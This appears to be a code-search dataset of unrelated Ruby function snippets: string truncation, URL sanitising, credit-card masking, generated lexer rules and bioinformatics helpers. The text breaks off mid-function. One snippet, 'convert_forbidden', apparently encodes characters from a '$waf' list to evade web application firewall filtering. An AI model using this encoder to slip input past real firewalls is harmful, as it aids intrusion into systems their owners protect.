"def strip_whitelisted(actual)\n initial_length = actual.length\n whitelisted = [\n '|aAccess limited to UNC Chapel Hill-authenticated users and to content added to the resource through the 2015 calendar year. After 2015, content may be added to which UNC users do not have full text access.|fUnlimited simultaneous users',\n \"|aUNC Library's One-Time Purchase of this title in 2013 gave our patrons access to the content that was available at the time of purchase. It also included all material added or updated during 2013.\"\n ]\n whitelisted.each do |okay_506|\n actual.delete(okay_506)\n end\n if initial_length > actual.length\n @has_whitelisted_506=true\n end\n return actual\n end",
"def fix!\n self.domain_length = self.domain.length \n self.domain = self.domain.ljust(32, \"\\x00\")\n end",
"def trim_requested; end",
"def overlength_penalty\n diff = query.length - reference.length\n diff = 0 if (diff < 1)\n penalty = OVERLENGTH_PENALTY * diff\n return penalty\n end",
"def strain(string)\n string = string.strip.gsub(/[#{ALWAYS_STRIP.join('')}#{@also_strip}]/, '')\n string.truncate!(@max_chars, @ellipsis) if @max_chars\n string if string.length >= @min_chars\n end",
"def sanitize_refpt1 refpt1\n refpt1.strip.gsub(\".\", \"\")\n end",
"def off_line_minimum(strArr)\n \nend",
"def display_link\n link.sub(SCHEME_PATTERN, '').truncate(48) if link\n end",
"def sequence_clip(p1 = 0, p2 = 0, ref_option = :HXB2, path_to_muscle = false)\n loc = self.locator(ref_option, path_to_muscle)\n l1 = loc[0]\n l2 = loc[1]\n if (p1 >= l1) & (p2 <= l2)\n seq = loc[4]\n ref = loc[5]\n g1 = 0\n ref.each_char do |char|\n break if l1 == p1\n g1 += 1\n l1 += 1 unless char == \"-\"\n end\n g2 = 1\n ref.reverse.each_char do |char|\n break if l2 == p2\n g2 += 1\n l2 -= 1 unless char == \"-\"\n end\n return ViralSeq::Sequence.new(self.name,seq[g1..(-g2)].tr(\"-\",\"\"))\n else\n return nil\n end\n end",
"def sanitize\n \tself.original_url.strip!\n \tself.sanitize_url = self.original_url.downcase.gsub(/(https?:\\/\\/)|(www\\.)/, \"\")\n \tself.sanitize_url = \"http://#{self.sanitize_url}\"\n\n \n start = 8\n final = self.sanitize_url.length\n\n while start <= final do\n sanitize_url[start] == ' ' ? sanitize_url[start] = '-' : sanitize_url[start] = sanitize_url[start] #change spaces for '-'\n break if sanitize_url[start] == '/' #break if '/' is found\n start +=1\n end\n\n self.sanitize_url = sanitize_url[0..start] #cut the string for creating the shortened_url\n self.short_url = sanitize_url + short_url #save the final shortened_url on the short_url's field\n end",
"def allow_short_words\n not @emphasis[:ignore_short_words]\n end",
"def short(str)\n limit = 140\n str = str.gsub(/(\\n|\\r)/, \"\")\n return str if str.size <= limit\n str.strip[0...(limit-3)]\n .concat(\"...\")\n end",
"def maskify(cc)\n # your beautiful code goes here\n \n text_length = cc.length\n \n new_text = \"\"\n last_four = cc.strip\n \n \n if text_length > 4\n loop_times = text_length-4\n loop_times.times do \n new_text.insert(0, \"#\") \n last_four.slice!(0)\n end\n elsif text_length > 0 && text_length <= 4\n last_four = cc\n else \n return \"\"\n end\n \n \n \n final = \"#{new_text}#{last_four}\"\n \n return final\n \nend",
"def skip_clean? path\n return true if path.extname == '.la' and self.class.skip_clean_paths.include? :la\n to_check = path.relative_path_from(prefix).to_s\n self.class.skip_clean_paths.include? to_check\n end",
"def trim_desc(s)\n if s && s.length > 0\n s[0..254]\n else\n s\n end\n end",
"def stopstop minsize=30\n type = \"XX\"\n orfs = []\n translate = Nucleotide::Translate.new(@trn_table)\n aa_frames = translate.aa_frames(@seq)\n num = 0\n aa_frames.each do | aa_frame |\n frame = aa_frame[:frame]\n aa = aa_frame[:sequence]\n aa_start = 0\n aa.split(/\\*/).each do | candidate |\n if candidate.size >= minsize and candidate.size > 0\n orf = ORF.new(num,type,@id,@descr,@seq,frame,aa_start*3,candidate)\n orfs.push orf\n num += 1\n end\n aa_start += candidate.size + 1\n end\n end\n orfs.sort\n end",
"def lstrip!() end",
"def maskify(cc)\n if cc.length <= 4\n return cc\n else\n pound = cc.length - 4\n masked_cc = []\n pound.times do\n masked_cc << '#'\n end\n masked_cc << cc[-4..-1]\n end\n masked_cc.join.to_s\nend",
"def remove_negations\n\n logger(\"Removing negations in #{@prefix.compact.join(\" \").to_s}\")\n\n prefix_array_reduced = @prefix.compact.join(\" \").to_s.gsub(/[\\/\\*]\\s0\\s[A-Za-z1-9]+|-\\s((([1-9][0-9]*\\.?[0-9]*)|(\\.[0-9]+)|[A-Za-z]+))\\s\\1|[\\+-\\/\\*]\\s0\\s0|[\\/\\*]\\s[A-Za-z0-9]+\\s0/,\"0\").gsub(/\\/\\s([A-Za-z1-9])\\s\\1/,\"1\")\n\n logger(\"Reduced to #{prefix_array_reduced}\")\n\n @prefix = prefix_array_reduced.split\n prefix_array_reduced = prefix_array_reduced.split.join(\" \")\n\n if !/\\/\\s([A-Za-z1-9])\\s\\1|[\\/\\*]\\s0\\s[A-Za-z1-9]+|-\\s((([1-9][0-9]*\\.?[0-9]*)|(\\.[0-9]+)|[A-Za-z]+))\\s\\2|[\\+-\\/\\*]\\s0\\s0|[\\/\\*]\\s[A-Za-z0-9]+\\s0/.match(prefix_array_reduced).nil?\n remove_negations\n else\n if !/^-\\s[\\/\\*\\+-].*0$/.match(prefix_array_reduced).nil?\n prefix_array_reduced.slice!(0..1)\n prefix_array_reduced.slice!((prefix_array_reduced.length-2)..(prefix_array_reduced.length-1))\n end\n return prefix_array_reduced\n end\n\n end",
"def filter_low_priority_errors(errors)\n list = errors.split(\"\\n\")\n list.reject! do |line|\n line.include?(\"is not approved by W3C\") ||\n line.include?('proprietary attribute \"ng-') || # AngularJS custom attributes\n line.include?(\"inserting implicit <body>\") ||\n line =~ /trimming empty <(i|em|span)>/ # Used for icons and presentation\n end\n return nil if list.size==0\n return list.join(\"\\n\")\n end",
"def maskify(cc)\n # your beautiful code goes here\n cc.length <= 4 ? cc : \"#\" * (cc.length-4) + cc[-4..-1]\nend",
"def sanitize()\n equiptment = [\"RNA-P1000\",\"RNA-P200\",\"RNA-P20\", \"Tube Block\", \"Bench Top\", \"Other\"]\n show do\n title \"Isolating RNA Effectively\"\n separator\n warning \"<b>Working with RNA can be tricky, since it is very sensitive to RNases.</b>\"\n note \"To prevent the degradation of our RNA and our hard work we must take care to use our best aseptic technique.\"\n note \"\"\n note \"\"\n check \"Wipe down area and equiptment you will be using with <b>70% EtOH</b> & <b>RNase ZAP</B>\"\n equiptment.each {|e| bullet \"<b>#{e}</b>\"}\n separator\n warning \"<b>Keep RNase ZAP on hand use whenever necessary.</b>\"\n end\n end",
"def truncate_formatted_filename f, unformatted_len, wid\n excess = unformatted_len - wid\n\n f = case @truncate_from\n\n when :right\n # FIXME: 2019-04-23 - do we need the control code at end ??\n f[0..wid - 3] + '$ '\n\n when :center\n\n # from central point calculate how much to remove in both directions\n center = unformatted_len / 2\n excess_half = excess / 2\n point = center + excess_half\n point1 = point - excess\n\n # remove text between point1 and point\n f[0..(point1 - 1)] + '$' + f[point + 2..-1] + ' '\n\n when :left\n\n # NOTE: we cannot remove the hint\n # for single hints we need to add extra space\n # there could be escape codes of varying length\n sindex = f.index(' ') || f.index('+')\n # 4 = 2 for literals, 2 to get ahead of sindex+1\n # FIXME crashing here, maybe there was a plus sign in place of space\n f[0..sindex + 0] + '<' + f[sindex + 3 + excess..-1] + ' '\n end\n return f\nend",
"def shorten( str, length = 120 )\n\tmatched = str.gsub( /\\n/, ' ' ).scan( /^.{0,#{length - 2}}/ )[0]\n\tunless $'.empty?\n\t\tmatched + '..'\n\telse\n\t\tmatched\n\tend\nend",
"def shorten\n result = url\n \n begin \n if url.size > 18 && !/http:\\/\\/snipr.com.*/.match(url)\n using(rdr = StreamReader.new(request.get_response.get_response_stream)) { \n result = rdr.read_to_end.to_s\n } \n end\n rescue Exception => e\n #catch all errors and just return the regular url\n end\n \n res = ((result.size >= url.size || result.empty?) ? url.ensure_http : result).to_s\n logger.debug(\"*** SniprUrl: Shortened url from: #{url} to #{res}\")\n res\n end",
"def trim_length\n \t400\n end",
"def ignorable!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 105 )\n\n \n # - - - - main rule block - - - -\n # at line 941:3: ( '//' (~ ( '\\\\n' | '\\\\r' ) )* ( ( '\\\\r' )? '\\\\n' )? | '/*' ( . )* '*/' | ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\\\\\' ( '\\\\r' )? '\\\\n' )+ )\n alt_44 = 3\n look_44_0 = @input.peek( 1 )\n\n if ( look_44_0 == 0x2f )\n look_44_1 = @input.peek( 2 )\n\n if ( look_44_1 == 0x2f )\n alt_44 = 1\n elsif ( look_44_1 == 0x2a )\n alt_44 = 2\n else\n raise NoViableAlternative( \"\", 44, 1 )\n end\n elsif ( look_44_0 == 0x9 || look_44_0 == 0xc || look_44_0 == 0x20 || look_44_0 == 0x5c || look_44_0 == 0xa0 )\n alt_44 = 3\n else\n raise NoViableAlternative( \"\", 44, 0 )\n end\n case alt_44\n when 1\n # at line 941:5: '//' (~ ( '\\\\n' | '\\\\r' ) )* ( ( '\\\\r' )? '\\\\n' )?\n match( \"//\" )\n # at line 941:10: (~ ( '\\\\n' | '\\\\r' ) )*\n while true # decision 38\n alt_38 = 2\n look_38_0 = @input.peek( 1 )\n\n if ( look_38_0.between?( 0x0, 0x9 ) || look_38_0.between?( 0xb, 0xc ) || look_38_0.between?( 0xe, 0xffff ) )\n alt_38 = 1\n\n end\n case alt_38\n when 1\n # at line 941:10: ~ ( '\\\\n' | '\\\\r' )\n if @input.peek( 1 ).between?( 0x0, 0x9 ) || @input.peek( 1 ).between?( 0xb, 0xc ) || @input.peek( 1 ).between?( 0xe, 0xff )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n end\n\n\n\n else\n break # out of loop for decision 38\n end\n end # loop for decision 38\n # at line 941:28: ( ( '\\\\r' )? '\\\\n' )?\n alt_40 = 2\n look_40_0 = @input.peek( 1 )\n\n if ( look_40_0 == 0xa || look_40_0 == 0xd )\n alt_40 = 1\n end\n case alt_40\n when 1\n # at line 941:30: ( '\\\\r' )? '\\\\n'\n # at line 941:30: ( '\\\\r' )?\n alt_39 = 2\n look_39_0 = @input.peek( 1 )\n\n if ( look_39_0 == 0xd )\n alt_39 = 1\n end\n case alt_39\n when 1\n # at line 941:30: '\\\\r'\n match( 0xd )\n\n end\n match( 0xa )\n\n end\n\n when 2\n # at line 942:5: '/*' ( . )* '*/'\n match( \"/*\" )\n # at line 942:10: ( . )*\n while true # decision 41\n alt_41 = 2\n look_41_0 = @input.peek( 1 )\n\n if ( look_41_0 == 0x2a )\n look_41_1 = @input.peek( 2 )\n\n if ( look_41_1 == 0x2f )\n alt_41 = 2\n elsif ( look_41_1.between?( 0x0, 0x2e ) || look_41_1.between?( 0x30, 0xffff ) )\n alt_41 = 1\n\n end\n elsif ( look_41_0.between?( 0x0, 0x29 ) || look_41_0.between?( 0x2b, 0xffff ) )\n alt_41 = 1\n\n end\n case alt_41\n when 1\n # at line 942:10: .\n match_any\n\n else\n break # out of loop for decision 41\n end\n end # loop for decision 41\n match( \"*/\" )\n\n when 3\n # at line 943:5: ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\\\\\' ( '\\\\r' )? '\\\\n' )+\n # at file 943:5: ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\\\\\' ( '\\\\r' )? '\\\\n' )+\n match_count_43 = 0\n while true\n alt_43 = 6\n case look_43 = @input.peek( 1 )\n when 0x9 then alt_43 = 1\n when 0xc then alt_43 = 2\n when 0x20 then alt_43 = 3\n when 0xa0 then alt_43 = 4\n when 0x5c then alt_43 = 5\n end\n case alt_43\n when 1\n # at line 943:7: '\\\\t'\n match( 0x9 )\n\n when 2\n # at line 943:14: '\\\\f'\n match( 0xc )\n\n when 3\n # at line 943:21: ' '\n match( 0x20 )\n\n when 4\n # at line 943:27: '\\\\u00A0'\n match( 0xa0 )\n\n when 5\n # at line 943:38: '\\\\\\\\' ( '\\\\r' )? '\\\\n'\n match( 0x5c )\n # at line 943:43: ( '\\\\r' )?\n alt_42 = 2\n look_42_0 = @input.peek( 1 )\n\n if ( look_42_0 == 0xd )\n alt_42 = 1\n end\n case alt_42\n when 1\n # at line 943:43: '\\\\r'\n match( 0xd )\n\n end\n match( 0xa )\n\n else\n match_count_43 > 0 and break\n eee = EarlyExit(43)\n\n\n raise eee\n end\n match_count_43 += 1\n end\n\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 105 )\n\n end",
"def cutinfo(string)\n inf=/\\024/=~string1\n inf=inf+2\n trans=string1[inf..-1]\nend",
"def link_sanitizer=(_arg0); end",
"def link_sanitizer=(_arg0); end",
"def link_sanitizer=(_arg0); end",
"def long_str # :nodoc:\n long ? Utils.prefix_long(long, '[no-]') : ''\n end",
"def shorten(len=20)\n self[0..len-1]\n end",
"def if_dangler_situation\n if(@i == @len) && !valid_word?(@prefix)\n @last_word_index = @words.keys.sort.last\n @words.delete(@last_word_index)\n end\n end",
"def truncate_legend_label(label)\n truncated_label = label.to_s\n while calculate_width(scale_fontsize(@legend_font_size), truncated_label) > (@columns - @legend_left_margin - Gruff::Base::RIGHT_MARGIN) && (truncated_label.length > 1)\n truncated_label = truncated_label[0..truncated_label.length-2]\n end\n truncated_label + (truncated_label.length < label.to_s.length ? \"…\" : '')\n end",
"def ltrunc(max)\n if length > max\n sub(/^.*?(.{#{max - 3}})$/, '...\\1')\n else\n self\n end\n end",
"def skip_known_failures(passphrase)\n passphrase.gsub(/[iol].+$/) { |m| m.chars.first.next + ('a' * m[1..-1].size) }\n end",
"def relax\n # Sometimes a farmer wants to relax. In doing so, you will get a chance to enjoy the beauty of each one of your fields (without harvesting them).\n Crop.relax\n end",
"def strip_wild_card_alts(disabled_alts)\n sorted_disable_alts = ArrayList.new(disabled_alts)\n Collections.sort(sorted_disable_alts)\n last_alt = sorted_disable_alts.get(sorted_disable_alts.size - 1)\n block_ast = @dfa.attr_nfa.attr_grammar.get_decision_block_ast(@dfa.attr_decision_number)\n # System.out.println(\"block with error = \"+blockAST.toStringTree());\n last_alt_ast = nil\n if ((block_ast.get_child(0).get_type).equal?(ANTLRParser::OPTIONS))\n # if options, skip first child: ( options { ( = greedy false ) )\n last_alt_ast = block_ast.get_child(last_alt.int_value)\n else\n last_alt_ast = block_ast.get_child(last_alt.int_value - 1)\n end\n # System.out.println(\"last alt is \"+lastAltAST.toStringTree());\n # if last alt looks like ( ALT . <end-of-alt> ) then wildcard\n # Avoid looking at optional blocks etc... that have last alt\n # as the EOB:\n # ( BLOCK ( ALT 'else' statement <end-of-alt> ) <end-of-block> )\n if (!(last_alt_ast.get_type).equal?(ANTLRParser::EOB) && (last_alt_ast.get_child(0).get_type).equal?(ANTLRParser::WILDCARD) && (last_alt_ast.get_child(1).get_type).equal?(ANTLRParser::EOA))\n # System.out.println(\"wildcard\");\n disabled_alts.remove(last_alt)\n end\n end",
"def run_line_length_cop; end",
"def truncate_on_word_boundary(str, min_len, max_len, spillover_if_necessary=false, start_offset=0, add_trailer=true)\n return \"\" if blank(str)\n more_url_link = yield if block_given?\n s = truncate(str, min_len, max_len, true, start_offset, add_trailer, more_url_link)\n return s if !s.nil?\n\n ## What to do if we fail?\n if s.nil? && spillover_if_necessary\n i = str[start_offset+max_len..str.length].index(@@separators)\n return str if i.nil?\n\n retval = str[start_offset..start_offset+max_len+i-1]\n retval += \"...\" if add_trailer\n retval += \" #{more_url_link}\" unless blank(more_url_link)\n return retval\n else\n return nil ## Return nil so that the user knows that this is an exceptional condition and handles it appropriately\n end\n end",
"def lex_ignore(length)\n \n return if length.eql?0 #Si no hay nada regresa\n\n word = @input[0..length-1] # Se crea un aux de lo que se quiere ignorar\n lineas = (word + ' ').lines.to_a.length.pred #Se saca el numero de lineas, \n #convirtiendo en arreglo de las palabras separadas \\n y midiendolo\n @line += lineas\n @input = @input[length..@input.length] # Se omite la solicitado\n\n if lineas.eql?0 then\n @column += length #Se suma las columnas omitidas a las que habia\n else\n @column = 1 #Sino se colocan en 1 por salto de linea\n end\n end",
"def prune_string(string)\n string.chomp.slice(0..pruned_width)\n end",
"def alternatives_for_invalids\n return [4] if lines[0] == ' ' && lines[1] == '|_|' && lines[2] == ' '\n\n return [4] if lines[0] == ' ' && lines[1] == '|_ ' && lines[2] == ' |'\n\n return [4] if lines[0] == ' ' && lines[1] == '| |' && lines[2] == ' |'\n\n return [4] if lines[0] == ' ' && lines[1] == ' _|' && lines[2] == ' |'\n\n return [4] if lines[0] == ' |' && lines[1] == '|_|' && lines[2] == ' |'\n\n []\n end",
"def combine_cc_and_dl(documents)\n if documents.has_key?(\"has_driving_license\") && documents.has_key?(\"has_credit_card\") && documents.size < 4\n documents.delete(\"has_driving_license\")\n documents.delete(\"has_credit_card\")\n documents[\"has_driving_license_and_credit_card\"] = false\n end\n end",
"def clean_an\n if aleph_record?\n an_numeric_component.prepend('MIT01')\n elsif aleph_cr_record?\n an_numeric_component.prepend('MIT30')\n end\n end",
"def adjust(s)\n [s.length, @nShields].min\n end",
"def find_truncated_sequence(uri, sorted_sequences, target_length)\n sorted_sequences.find do |seq|\n (uri.special_format.length - seq.length + SEPARATOR.length) <= target_length\n end\n end",
"def droppre s\n if s.select{|i|i=~/^# *!intermediate/}.size>0\n flag=false\n s.map{|i|\n i=~/^# *!intermediate/\n flag=true if $&\n flag ? i : nil\n }-[nil]\n else\n s\n end\n end",
"def marc_lcc_to_broad_category( options = {}, spec=\"050a:060a:090a:096a\")\n # Trying to match things that look like LCC, and not match things\n # that don't. Is tricky.\n lcc_regex = LCC_REGEX\n default_value = options.has_key?(:default) ? options[:default] : \"Unknown\"\n translation_map = Traject::TranslationMap.new(\"lcc_top_level\")\n\n extractor = MarcExtractor.new(spec, :separator => nil)\n\n lambda do |record, accumulator|\n candidates = extractor.extract(record)\n\n candidates.reject! do |candidate|\n !(lcc_regex.match candidate)\n end\n\n accumulator.concat translation_map.translate_array!(candidates.collect {|a| a.lstrip.slice(0, 1)}).uniq\n\n if default_value && accumulator.empty?\n accumulator << default_value\n end\n end\n end",
"def limit(length)\n (self.length > length)? self[0...length].gsub(/(?![\\s\\S]+?[,:;)\\/\\\\\\|])([,:;)\\/\\\\\\|].*)/,'') : self\n end",
"def fix_train_availables(tlist)\n phase_list = %w[1 2 3]\n phase_list << '3a' if @units[2] && !@kits[3]\n phase_list.concat(%w[4 4a]) if @kits[3]\n tlist.each do |h|\n h.delete(:available_on) if h[:available_on] && !phase_list.include?(h[:available_on])\n end\n end",
"def remove_non_amino_acids(sequence)\n sequence.gsub(Nonstandard_AA_re, '')\n end",
"def filter(minlen)\n return if skip_step?(@names.get('filter'), 'filtering')\n\n # Only filter input files from Illumina CASAVA 1.8 pipeline\n if `head -n 1 #{@names.get('reads')} | cut -d ' ' -f 3`.empty?\n run_cmd(\n 'fastq_illumina_filter' \\\n \" --keep N -v -l #{minlen} \" \\\n \" -o #{@names.get('filter')}\" \\\n \" #{@names.get('reads')}\"\n )\n else\n @names.set('filter', '.fastq')\n end\n end",
"def maskify(cc)\n cc.size < 5 ? cc : cc[-4..-1].rjust(cc.size, '#')\nend",
"def cleanup!(max_len)\n if self.length >= max_len\n self.clear\n end\n end",
"def repair(text); end",
"def potential_rule(line)\n line =~ /\\s@(rx|dfa) / && # Has a regexp\n line !~ /\\bfast:/ && # Does not already have an fast\n line !~ /\\st:/ && # Does not have a transformation\n line =~ FIELD_RE # Involves a field fast knows about.\nend",
"def directive_line!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 107 )\n\n \n # - - - - main rule block - - - -\n # at line 956:5: ( IGNORABLE )* ( HIDE | REQUIRE ) ( IGNORABLE )* ( ( '\\\\r' )? '\\\\n' )?\n # at line 956:5: ( IGNORABLE )*\n while true # decision 51\n alt_51 = 2\n look_51_0 = @input.peek( 1 )\n\n if ( look_51_0 == 0x9 || look_51_0 == 0xc || look_51_0 == 0x20 || look_51_0 == 0x2f || look_51_0 == 0x5c || look_51_0 == 0xa0 )\n alt_51 = 1\n\n end\n case alt_51\n when 1\n # at line 956:5: IGNORABLE\n ignorable!\n\n else\n break # out of loop for decision 51\n end\n end # loop for decision 51\n # at line 957:5: ( HIDE | REQUIRE )\n alt_52 = 2\n look_52_0 = @input.peek( 1 )\n\n if ( look_52_0 == 0x68 )\n alt_52 = 1\n elsif ( look_52_0 == 0x69 || look_52_0 == 0x72 )\n alt_52 = 2\n else\n raise NoViableAlternative( \"\", 52, 0 )\n end\n case alt_52\n when 1\n # at line 957:7: HIDE\n hide!\n\n when 2\n # at line 958:7: REQUIRE\n require!\n\n end\n # at line 960:5: ( IGNORABLE )*\n while true # decision 53\n alt_53 = 2\n look_53_0 = @input.peek( 1 )\n\n if ( look_53_0 == 0x9 || look_53_0 == 0xc || look_53_0 == 0x20 || look_53_0 == 0x2f || look_53_0 == 0x5c || look_53_0 == 0xa0 )\n alt_53 = 1\n\n end\n case alt_53\n when 1\n # at line 960:5: IGNORABLE\n ignorable!\n\n else\n break # out of loop for decision 53\n end\n end # loop for decision 53\n # at line 961:5: ( ( '\\\\r' )? '\\\\n' )?\n alt_55 = 2\n look_55_0 = @input.peek( 1 )\n\n if ( look_55_0 == 0xa || look_55_0 == 0xd )\n alt_55 = 1\n end\n case alt_55\n when 1\n # at line 961:7: ( '\\\\r' )? '\\\\n'\n # at line 961:7: ( '\\\\r' )?\n alt_54 = 2\n look_54_0 = @input.peek( 1 )\n\n if ( look_54_0 == 0xd )\n alt_54 = 1\n end\n case alt_54\n when 1\n # at line 961:7: '\\\\r'\n match( 0xd )\n\n end\n match( 0xa )\n\n end\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 107 )\n\n end",
"def sanitizeBusstop\n [@busstop, @endstop].each do |stop|\n stop = stop.split(/[ \\/]/)\n stop.delete(\"Metro\")\n stop.delete(\"Inbound\")\n stop.delete(\"Outbound\")\n stop = stop.join(\" \")\n end\n end",
"def create_bad_scans_skip\n @index = self.short_description.index(\"skip ip\")\n @result = self.short_description[@index + 1, 22]\n @string = @result.gsub(/[skip:,]/,' ')\n @array = @string.split(/\\s*/)\n @skip_number = \"\"\n @array.each do |char|\n if(char==\"\")\n @skip_number.concat(\"\")\n elsif(char==\":\")\n @skip_number.concat(\"\")\n elsif(char==\",\")\n @skip_number.concat(\"\")\n else\n @skip_number.concat(char)\n end\n end\n self.skip = @skip_number.strip()\nend",
"def make_syllable\n structure = self.structure.chars\n\n while true\n syll = ''\n structure.each do |ptype|\n # If the char is '?', skip with 50% chance to remove last character\n # (think RegEx usage of '?')\n if ptype == '?'\n if rand < 0.5\n syll = syll[0...syll.length - 1]\n end\n next\n end\n\n syll << choose(self.phonemes[ptype], self.exponent)\n end\n\n # Make sure this syllable doesn't violate a restriction\n bad = false\n self.restricts.each do |regex|\n if /#{regex}/ =~ syll\n bad = true\n break\n end\n end\n next if bad\n\n return spell(syll)\n end\n end",
"def maskify(cc)\n return cc.length <= 4 ? cc : ('#' * (cc.length-4)) + cc[cc.length-4..cc.length-1]\nend",
"def link_to_ird_strains!(noisy = false)\n cutoff_year = Time.now.year % 100\n \n parts = strain_name.split(/\\//)\n part_synonyms = parts.each_with_index.map do |part, i|\n part.gsub! /^\\s+|\\s+$/, ''\n synonyms = case\n when i == 0\n # First part, the type of the influenza virus, we'll leave alone\n [part]\n when (i == parts.size - 1 and part =~ /^(\\d{2}?)(\\d{2})$/)\n # Try two digit AND four digit date, assuming that two digit dates past this year's are in the 1900's\n if $1.size > 0 then [part, $2] else [part, \"#{$2.to_i > cutoff_year ? 19 : 20}#{$2}\"] end\n when part =~ /^0*(\\d+)$/\n # Allow some flexibility in leading zeros for middle segments containing numbers\n [$1, \"0#{$1}\", \"00#{$1}\", \"000#{$1}\"]\n when synonym_dict[part]\n synonym_dict[part].to_a\n else\n [part]\n end\n # Now add more possibilities: hyphens removed, underscores vs. spaces\n synonyms.map do |syn|\n more_syns = [syn]\n more_syns << syn.gsub(/-/, '') if syn =~ /-/\n more_syns << syn.gsub(/ /, '_') if syn =~ /_/\n more_syns << syn.gsub(/_/, ' ') if syn =~ / /\n more_syns\n end.flatten\n end\n \n part_synonyms.first.product(*part_synonyms.drop(1)).each do |parts|\n name = parts.join('/').gsub('_', '\\\\_').gsub('%', '\\\\%')\n IrdStrain.where(\"strain_name LIKE ?\", name).find_each do |ird_strain|\n puts \"#{strain_name} linked to IRD strain #{ird_strain.id}, name #{ird_strain.strain_name}.\" if noisy\n ird_strains << ird_strain unless ird_strains.include? ird_strain\n end\n end\n \n ird_strains.size > 0\n end",
"def truncate_message(message, length, ellipsis_string)\n chars = message.scan(/./mu)\n max_length_with_ellipsis = length - ellipsis_string.length - 1\n allowed_chars = chars[0..max_length_with_ellipsis]\n allowed_chars.join.gsub(/ ?\\.?,?$/, '') + ellipsis_string\n end",
"def illegal_words\n @words.select{ |word| word.length > @width }\n end",
"def correct_license_length\n key = Agent.config[:license_key]\n\n if key.length == 40\n true\n else\n ::NewRelic::Agent.logger.error(\"Invalid license key: #{key}\")\n false\n end\n end",
"def pre_process(text_line)\n processed_line = \"\"\n if text_line.slice(0..1)== \"LD\" && text_line.slice(14..20) == 'XXXXXXX'\n if @false_header_loaded\n processed_line = \"DT\" + text_line.slice(2..text_line.length())\n else\n processed_line = \"DH\" + text_line.slice(2..text_line.length())\n end\n elsif text_line.slice(0..1)== \"LD\"\n @false_header_loaded = true\n processed_line = text_line\n else\n processed_line = text_line\n end\n\n return processed_line\n\n end",
"def shortened_string(string)\n string[0, 100] << \"...\" unless string.length < 100\n end",
"def lstrip() end",
"def convert_forbidden(string)\n\n\tfinal_string = \"\"\n\tlen = string.length\n\n\tskip = false\n\tfor i in 0..string.length-1 do\n\t\t\tif !skip then\n\t\t\t\tif $waf.include? string[i] then\n\t\t\t\t\tres = uni(string[i] + string[i+1])\n\t\t\t\t\tfinal_string += res\n\t\t\t\t\tskip = true\n\t\t\t\telse\n\t\t\t\t\tfinal_string += URI.encode string[i]\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tskip = false\n\t\t\tend\n\tend\n\n\treturn final_string.gsub(\"/\",\"%2F\").gsub(\"[\",\"%5B\").gsub(\"]\",\"%5D\").gsub(\"&\",\"%26\")\nend",
"def constrain_length(bob, minlen, maxlen)\n dir = bob.location - @anchor\n d = dir.mag\n # Is it too short?\n if d < minlen\n dir.normalize!\n dir *= minlen\n # Reset location and stop from moving (not realistic physics)\n bob.location = @anchor + dir\n bob.velocity *= 0\n elsif d > maxlen # is it too long?\n dir.normalize!\n dir *= maxlen\n # Reset location and stop from moving (not realistic physics)\n bob.location = @anchor + dir\n bob.velocity *= 0\n end\n end",
"def make_delay0(len)\n len > 0 ? make_delay(len) : false\n end",
"def compile_line(aRawLine)\n line_rep = aRawLine.map { |couple| compile_couple(couple) }\n \n # Apply the rule: when a line just consist of spaces \n # and a section element, then remove all the spaces from that line.\n line_to_squeeze = line_rep.all? do |item|\n if item.kind_of?(StaticText)\n item.source =~ /\\s+/\n else\n false\n end\n end\n line_rep_ending(line_rep) unless line_to_squeeze\n \n return line_rep\n end",
"def strip_stopwords!(stopwords, min_length)\n #noinspection RubyParenthesesAfterMethodCallInspection\n @body = @body.split.delete_if() do |x|\n t = x.downcase.gsub(/[^a-z]/, '')\n t.length < min_length || stopwords.include?(t)\n end.join(' ')\n end",
"def clip_grads(grads, max_norm)\n total_norm = grads.reduce(0) do |total, grad|\n total + (grad**2).sum\n end\n\n total_norm = Numo::SFloat::Math.sqrt(total_norm)\n\n rate = max_norm / (total_norm + 1e-6)\n\n grads.each { |grad| grad.inplace * rate } if rate < 1\nend",
"def ignorable_nl!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 106 )\n\n \n # - - - - main rule block - - - -\n # at line 948:3: ( '//' (~ ( '\\\\n' | '\\\\r' ) )* ( ( '\\\\r' )? '\\\\n' )? | '/*' ( . )* '*/' | ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\n' | '\\\\r' )+ )\n alt_50 = 3\n look_50_0 = @input.peek( 1 )\n\n if ( look_50_0 == 0x2f )\n look_50_1 = @input.peek( 2 )\n\n if ( look_50_1 == 0x2f )\n alt_50 = 1\n elsif ( look_50_1 == 0x2a )\n alt_50 = 2\n else\n raise NoViableAlternative( \"\", 50, 1 )\n end\n elsif ( look_50_0.between?( 0x9, 0xa ) || look_50_0.between?( 0xc, 0xd ) || look_50_0 == 0x20 || look_50_0 == 0xa0 )\n alt_50 = 3\n else\n raise NoViableAlternative( \"\", 50, 0 )\n end\n case alt_50\n when 1\n # at line 948:5: '//' (~ ( '\\\\n' | '\\\\r' ) )* ( ( '\\\\r' )? '\\\\n' )?\n match( \"//\" )\n # at line 948:10: (~ ( '\\\\n' | '\\\\r' ) )*\n while true # decision 45\n alt_45 = 2\n look_45_0 = @input.peek( 1 )\n\n if ( look_45_0.between?( 0x0, 0x9 ) || look_45_0.between?( 0xb, 0xc ) || look_45_0.between?( 0xe, 0xffff ) )\n alt_45 = 1\n\n end\n case alt_45\n when 1\n # at line 948:10: ~ ( '\\\\n' | '\\\\r' )\n if @input.peek( 1 ).between?( 0x0, 0x9 ) || @input.peek( 1 ).between?( 0xb, 0xc ) || @input.peek( 1 ).between?( 0xe, 0xff )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n end\n\n\n\n else\n break # out of loop for decision 45\n end\n end # loop for decision 45\n # at line 948:28: ( ( '\\\\r' )? '\\\\n' )?\n alt_47 = 2\n look_47_0 = @input.peek( 1 )\n\n if ( look_47_0 == 0xa || look_47_0 == 0xd )\n alt_47 = 1\n end\n case alt_47\n 